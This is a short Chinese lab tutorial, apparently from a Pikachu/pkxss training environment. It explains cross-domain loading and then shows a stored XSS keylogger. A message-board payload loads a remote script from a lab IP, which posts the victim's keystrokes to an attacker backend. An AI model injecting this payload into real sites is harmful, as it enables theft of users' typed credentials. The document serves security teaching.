案例三:Xss获取键盘记录
先简单介绍一下跨域
跨域:http:// www . gxy.com :8080 / script/test.js
协议 子域名 主域名 端口 资源地址
当协议、主机、端口的任意一个不相同时,称不同域
将不同域之间的请求数据操作,称跨域操作
下面这些标签可以跨域加载资源
<script src=”…”>//js,加载到本地执行
<img src=”…”>//图片
<link href=”…”>//css
<iframe src=“…”>//任意资源
把js 文件放到被攻击者的页面当中,通过获取键盘值,post发送给攻击者后台
利用:
存储型xss 留言板 输入
<script src=" http://192.168.27.156 /pkxss/xkeypress/rk.php"> </script>
在键盘上随便输入发现会跳出来 页面请求失败
在pkxss后台我们就可以看到获取的信息